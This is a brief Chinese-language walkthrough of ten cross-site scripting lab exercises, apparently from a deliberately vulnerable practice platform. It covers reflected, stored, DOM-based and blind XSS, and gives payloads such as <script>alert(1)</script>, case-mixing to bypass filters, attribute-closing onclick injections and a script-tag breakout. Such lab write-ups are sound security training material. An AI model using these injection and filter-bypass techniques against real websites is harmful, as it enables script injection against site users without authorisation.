1、反射型xss(get)
直接输入js代码 <script>alert(1)</script>,进入源代码,修改可写入字符长度
2、反射型(post)
登陆后,直接输入js代码 <script>alert(1)</script>
3、存储型xss
1、插入特殊字符看是否有过滤,2、直接插入完整的js代码 <script>alert(1)</script>
4、DOM型xss
先输入一些特殊字符
尝试闭合的方式 ' οnclick="alert(1)"
5、DOM型xss-x
输出一些字符‘”<>123,查看页面源代码
尝试闭合的方式 ' οnclick="alert(1)"
6、xss之盲打
1、直接输入js代码 <script>alert(1)</script>
2、登录后台管理查看留言,发现弹窗
7、xss之过滤
首先还是输入一些特殊字符
输入完整的js语句<script>alert(1)</script>
然后可以尝试使用大小写来绕过<Script>alert(1)</Script>
8、xss之htmlspecialchars
输入js语句查看源代码
构造闭合href中的单引号' οnclick=alert(1) '
9、xss之href输出
输入一些特殊字符测试,发现源码是的单引号、双引号、以及左右尖括号都是被转义
在a属性的标签中可以使用javascript协议来执行js
10、xss之js输出
输入一些特殊字符,查看网页源码
构造一个闭合 '</script><script>alert(1)</script>